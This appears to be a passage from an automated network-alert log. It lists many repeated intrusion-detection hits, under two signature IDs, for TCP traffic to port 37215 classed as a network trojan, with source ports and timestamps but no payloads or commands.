          SID:2835222
          Source Port:52986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473599
          SID:2835222
          Source Port:42358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525306
          SID:2835222
          Source Port:40876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324704
          SID:2829579
          Source Port:55840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175815
          SID:2835222
          Source Port:53382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.379154
          SID:2829579
          Source Port:41534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484446
          SID:2829579
          Source Port:60136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332290
          SID:2829579
          Source Port:34032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553807
          SID:2829579
          Source Port:56194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709299
          SID:2835222
          Source Port:35432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987488
          SID:2829579
          Source Port:34062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434852
          SID:2835222
          Source Port:54944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526472
          SID:2829579
          Source Port:33522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941701
          SID:2829579
          Source Port:41022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287637
          SID:2835222
          Source Port:56612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.412088
          SID:2835222
          Source Port:53004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485233
          SID:2829579
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338507
          SID:2829579
          Source Port:45114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486297
          SID:2835222
          Source Port:45192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102788
          SID:2829579
          Source Port:56486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964397
          SID:2835222
          Source Port:47670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239193
          SID:2829579
          Source Port:59030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537387
          SID:2835222
          Source Port:52990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665388
          SID:2829579
          Source Port:51662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.291083
          SID:2829579
          Source Port:52628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.992918
          SID:2835222
          Source Port:60620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840197
          SID:2829579
          Source Port:58978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930513
          SID:2829579
          Source Port:56002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764701
          SID:2829579
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140253
          SID:2829579
          Source Port:41988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772726
          SID:2829579
          Source Port:37460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090671
          SID:2829579
          Source Port:44634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327870
          SID:2835222
          Source Port:47868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991782
          SID:2835222
          Source Port:55992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.323563
          SID:2835222
          Source Port:59462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299523
          SID:2835222
          Source Port:58016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978379
          SID:2829579
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562094
          SID:2835222
          Source Port:53766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042392
          SID:2829579
          Source Port:57308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008783
          SID:2835222
          Source Port:46028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970205
          SID:2829579
          Source Port:37662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266635
          SID:2829579
          Source Port:36314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739472
          SID:2829579
          Source Port:50644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778186
          SID:2829579
          Source Port:50612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993716
          SID:2835222
          Source Port:33974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.220946
          SID:2829579
          Source Port:49276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923758
          SID:2829579
          Source Port:44872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817729
          SID:2829579
          Source Port:37712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538773
          SID:2835222
          Source Port:38696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089745
          SID:2829579
          Source Port:47882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223112
          SID:2835222
          Source Port:39526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.940980
          SID:2835222
          Source Port:60206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267611
          SID:2829579
          Source Port:56234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659746
          SID:2835222
          Source Port:44032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841152
          SID:2835222
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771994
          SID:2835222
          Source Port:57840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710912
          SID:2835222
          Source Port:53818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922046
          SID:2835222
          Source Port:40538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878545
          SID:2829579
          Source Port:34556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125792
          SID:2829579
          Source Port:59170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187407
          SID:2829579
          Source Port:35990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866041
          SID:2829579
          Source Port:35500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.753177
          SID:2829579
          Source Port:53716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536718
          SID:2835222
          Source Port:59932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842326
          SID:2835222
          Source Port:43240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.679893
          SID:2835222
          Source Port:48708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.768856
          SID:2835222
          Source Port:43978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178472
          SID:2835222
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280346
          SID:2829579
          Source Port:44022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744907
          SID:2835222
          Source Port:59066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067238
          SID:2829579
          Source Port:48824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492931
          SID:2829579
          Source Port:58318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117264
          SID:2829579
          Source Port:59930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214790
          SID:2835222
          Source Port:34958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147650
          SID:2835222
          Source Port:48484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298235
          SID:2829579
          Source Port:57108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660243
          SID:2835222
          Source Port:49702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797895
          SID:2829579
          Source Port:52304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771995
          SID:2829579
          Source Port:39540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764741
          SID:2835222
          Source Port:50026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527388
          SID:2835222
          Source Port:33726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337858
          SID:2829579
          Source Port:45506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755701
          SID:2829579
          Source Port:37102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176410
          SID:2829579
          Source Port:55186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328875
          SID:2835222
          Source Port:35754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476475
          SID:2835222
          Source Port:35044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273303
          SID:2829579
          Source Port:39140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729118
          SID:2829579
          Source Port:45550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708374
          SID:2835222
          Source Port:51650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852706
          SID:2835222
          Source Port:54684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710986
          SID:2835222
          Source Port:57412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147939
          SID:2829579
          Source Port:37274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.474800
          SID:2835222
          Source Port:34734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473580
          SID:2835222
          Source Port:58504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271276
          SID:2835222
          Source Port:59330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976626
          SID:2829579
          Source Port:55932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266666
          SID:2835222
          Source Port:52594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770867
          SID:2829579
          Source Port:59272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010448
          SID:2829579
          Source Port:36242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299588
          SID:2835222
          Source Port:45664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.157137
          SID:2829579
          Source Port:32772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841445
          SID:2829579
          Source Port:46118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.288460
          SID:2835222
          Source Port:50616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476616
          SID:2829579
          Source Port:34328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807442
          SID:2835222
          Source Port:46976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807841
          SID:2835222
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914261
          SID:2835222
          Source Port:40170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711056
          SID:2829579
          Source Port:48306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.957913
          SID:2829579
          Source Port:35334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156870
          SID:2835222
          Source Port:51490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889202
          SID:2835222
          Source Port:48810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795357
          SID:2829579
          Source Port:45960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542163
          SID:2829579
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943507
          SID:2829579
          Source Port:37794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209028
          SID:2829579
          Source Port:54658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536749
          SID:2835222
          Source Port:58812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290584
          SID:2829579
          Source Port:53116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614691
          SID:2835222
          Source Port:45130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143698
          SID:2835222
          Source Port:44690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.770549
          SID:2829579
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.162328
          SID:2835222
          Source Port:32920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466146
          SID:2829579
          Source Port:55722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635876
          SID:2835222
          Source Port:55878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743650
          SID:2835222
          Source Port:35418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147777
          SID:2829579
          Source Port:52970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847560
          SID:2835222
          Source Port:46198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795053
          SID:2829579
          Source Port:34454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816729
          SID:2835222
          Source Port:42068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998818
          SID:2829579
          Source Port:33074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357084
          SID:2829579
          Source Port:58628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301294
          SID:2835222
          Source Port:49198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626911
          SID:2829579
          Source Port:49122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551185
          SID:2835222
          Source Port:45954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938299
          SID:2835222
          Source Port:42436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.469705
          SID:2829579
          Source Port:55710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547400
          SID:2829579
          Source Port:34172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.224275
          SID:2829579
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542926
          SID:2829579
          Source Port:42682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766450
          SID:2829579
          Source Port:33094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845807
          SID:2835222
          Source Port:55826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271668
          SID:2829579
          Source Port:38730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066602
          SID:2829579
          Source Port:51828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735875
          SID:2835222
          Source Port:55768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501423
          SID:2829579
          Source Port:46576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.171919
          SID:2835222
          Source Port:56258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051230
          SID:2835222
          Source Port:38486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599223
          SID:2835222
          Source Port:42068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272709
          SID:2829579
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068480
          SID:2835222
          Source Port:53268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093566
          SID:2835222
          Source Port:43878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202226
          SID:2829579
          Source Port:36470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268750
          SID:2835222
          Source Port:54718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020592
          SID:2829579
          Source Port:34680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964441
          SID:2835222
          Source Port:58254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893939
          SID:2835222
          Source Port:47488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336650
          SID:2835222
          Source Port:40576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878355
          SID:2835222
          Source Port:47452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156487
          SID:2835222
          Source Port:59626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708279
          SID:2829579
          Source Port:53216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.607162
          SID:2835222
          Source Port:45380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210448
          SID:2835222
          Source Port:36918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222480
          SID:2835222
          Source Port:36504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922681
          SID:2829579
          Source Port:53396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651161
          SID:2829579
          Source Port:59978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.324875
          SID:2835222
          Source Port:59774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941431
          SID:2835222
          Source Port:57378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221020
          SID:2829579
          Source Port:59940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093223
          SID:2829579
          Source Port:60618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267448
          SID:2835222
          Source Port:40574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595119
          SID:2829579
          Source Port:37474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892409
          SID:2835222
          Source Port:55580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764569
          SID:2829579
          Source Port:38414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213736
          SID:2829579
          Source Port:44710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766450
          SID:2829579
          Source Port:51836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160152
          SID:2835222
          Source Port:32794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953408
          SID:2829579
          Source Port:40798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217155
          SID:2835222
          Source Port:58676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743699
          SID:2835222
          Source Port:54910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923607
          SID:2829579
          Source Port:56158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.348925
          SID:2835222
          Source Port:60030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979201
          SID:2835222
          Source Port:38490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925908
          SID:2835222
          Source Port:33618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989661
          SID:2835222
          Source Port:37646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216601
          SID:2829579
          Source Port:33506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326375
          SID:2835222
          Source Port:36874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818642
          SID:2829579
          Source Port:36504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131642
          SID:2829579
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183051
          SID:2829579
          Source Port:37972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976426
          SID:2829579
          Source Port:52146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669413
          SID:2835222
          Source Port:46390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544809
          SID:2835222
          Source Port:42210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.609545
          SID:2835222
          Source Port:52536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794408
          SID:2829579
          Source Port:44500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156732
          SID:2829579
          Source Port:35280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.304321
          SID:2829579
          Source Port:35230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678287
          SID:2835222
          Source Port:56678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840224
          SID:2835222
          Source Port:55248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535511
          SID:2835222
          Source Port:33332
          Destination Port:37215
